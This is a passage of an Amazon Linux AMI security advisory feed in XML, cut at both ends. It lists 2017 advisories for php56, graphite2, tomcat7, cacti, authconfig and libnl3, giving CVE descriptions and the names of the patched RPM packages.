version="4.9.43" release="17.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.43-17.38.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.43" release="17.38.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.43-17.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-871</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-871: medium priority package update for php56</title><issued date="2017-08-17 18:16:00" /><updated date="2017-08-17 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9229:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-&gt;dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.
1466746:
CVE-2017-9229 oniguruma: Invalid pointer dereference in left_adjust_char_head()
CVE-2017-9228:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it&#039;s used as an index, resulting in an out-of-bounds write memory corruption.
1466740:
CVE-2017-9228 oniguruma: Out-of-bounds heap write in bitset_set_range()
CVE-2017-9227:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching. Invalid handling of reg-&gt;dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.
1466739:
CVE-2017-9227 oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching
CVE-2017-9226:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of &#039;\\700&#039; would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.
1466736:
CVE-2017-9226 oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
1466730:
CVE-2017-9224 oniguruma: Out-of-bounds stack read in match_at() during regular expression searching
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9226" title="" id="CVE-2017-9226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9227" title="" id="CVE-2017-9227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9228" title="" id="CVE-2017-9228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9229" title="" id="CVE-2017-9229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.31" release="1.134.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-intl-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package 
name="php56-debuginfo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.31" release="1.134.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-enchant-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.31" 
release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.31" 
release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.31-1.134.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-872</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-872: important priority package update for graphite2</title><issued date="2017-08-17 18:27:00" /><updated date="2017-08-17 22:46:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7778:
1461260:
CVE-2017-7778 Mozilla: Vulnerabilities in the Graphite 2 library (MFSA 2017-16)
CVE-2017-7777:
The use of uninitialized memory related to &quot;graphite2::GlyphCache::Loader::read_glyph&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to negatively impact the execution of an application using graphite2 in unknown ways.
1472225:
CVE-2017-7777 graphite2: use of uninitialized memory "graphite2::GlyphCache::Loader::read_glyph"
CVE-2017-7776:
An out of bounds read flaw related to &quot;graphite2::Silf::getClassGlyph&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472223:
CVE-2017-7776 graphite2: heap-buffer-overflow read "graphite2::Silf::getClassGlyph"
CVE-2017-7775:
An assertion error has been reported in graphite2. An attacker could possibly exploit this flaw to cause an application crash.
1472221:
CVE-2017-7775 graphite2: assertion error "size() > n"
CVE-2017-7774:
An out of bounds read flaw related to &quot;graphite2::Silf::readGraphite&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472219:
CVE-2017-7774 graphite2: out of bounds read "graphite2::Silf::readGraphite"
CVE-2017-7773:
A heap-based buffer overflow flaw related to &quot;lz4::decompress&quot; (src/Decompressor) has been reported in graphite2. An attacker could exploit this issue to cause a crash or, possibly, execute arbitrary code.
1472215:
CVE-2017-7773 graphite2: heap-buffer-overflow write "lz4::decompress" (src/Decompressor)
CVE-2017-7772:
A heap-based buffer overflow flaw related to &quot;lz4::decompress&quot; has been reported in graphite2. An attacker could exploit this issue to cause a crash or, possibly, execute arbitrary code.
1472213:
CVE-2017-7772 graphite2: heap-buffer-overflow write "lz4::decompress" (CVE-2017-7772)
CVE-2017-7771:
An out of bounds read flaw related to &quot;graphite2::Pass::readPass&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472212:
CVE-2017-7771 graphite2: out of bounds read in "graphite2::Pass::readPass"
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7771" title="" id="CVE-2017-7771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7772" title="" id="CVE-2017-7772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7773" title="" id="CVE-2017-7773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7774" title="" id="CVE-2017-7774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7775" title="" id="CVE-2017-7775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7776" title="" id="CVE-2017-7776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7777" title="" id="CVE-2017-7777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7778" title="" id="CVE-2017-7778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphite2-devel" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-devel-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-debuginfo-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2-devel" version="1.3.10" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-devel-1.3.10-1.7.amzn1.i686.rpm</filename></package><package name="graphite2" version="1.3.10" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-1.3.10-1.7.amzn1.i686.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.10" release="1.7.amzn1" 
epoch="0" arch="i686"><filename>Packages/graphite2-debuginfo-1.3.10-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-873</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-873: important priority package update for tomcat7</title><issued date="2017-08-17 18:30:00" /><updated date="2017-08-31 23:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
CVE-2017-5648:
While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.
A vulnerability was discovered in tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application.
1441223:
CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5648" title="" id="CVE-2017-5648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.79" release="1.28.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-log4j-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.79-1.28.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-874</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-874: important priority package update for cacti</title><issued date="2017-08-17 18:36:00" /><updated date="2017-08-31 23:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12066:
CVE-2017-12065:
CVE-2017-10970:
Cross-site scripting (XSS) vulnerability in link.php in Cacti 1.1.12 allows remote anonymous users to inject arbitrary web script or HTML via the id parameter, related to the die_html_input_error function in lib/html_validate.php.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10970" title="" id="CVE-2017-10970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12065" title="" id="CVE-2017-12065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12066" title="" id="CVE-2017-12066" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.16" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.16-1.16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-875</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-875: medium priority package update for authconfig</title><issued date="2017-08-30 23:37:00" /><updated date="2017-09-14 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7488:
A flaw was found where authconfig could configure sssd in a way that treats existing and non-existing logins differently, leaking information on the existence of a user. An attacker with physical or network access to the machine could enumerate users via a timing attack.
1441604:
CVE-2017-7488 authconfig: Information leak when SSSD is used for authentication against remote server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7488" title="" id="CVE-2017-7488" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="authconfig" version="6.2.8" release="30.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/authconfig-6.2.8-30.31.amzn1.x86_64.rpm</filename></package><package name="authconfig-debuginfo" version="6.2.8" release="30.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/authconfig-debuginfo-6.2.8-30.31.amzn1.x86_64.rpm</filename></package><package name="authconfig" version="6.2.8" release="30.31.amzn1" epoch="0" arch="i686"><filename>Packages/authconfig-6.2.8-30.31.amzn1.i686.rpm</filename></package><package name="authconfig-debuginfo" version="6.2.8" release="30.31.amzn1" epoch="0" arch="i686"><filename>Packages/authconfig-debuginfo-6.2.8-30.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-876</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-876: medium priority package update for libnl3</title><issued date="2017-08-30 23:38:00" /><updated date="2017-08-31 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-0553:
An integer overflow leading to a heap-buffer overflow was found in the libnl library. An attacker could use this flaw to cause an application compiled with libnl to crash or possibly execute arbitrary code in the context of the user running such an application.
1440788:
CVE-2017-0553 libnl: Integer overflow in nlmsg_reserve()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0553" title="" id="CVE-2017-0553" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnl3-debuginfo" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-debuginfo-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-cli" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-cli-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-doc" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-doc-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-devel" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-devel-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-doc" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-doc-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-cli" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-cli-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-debuginfo" version="3.2.28" release="4.6.amzn1" 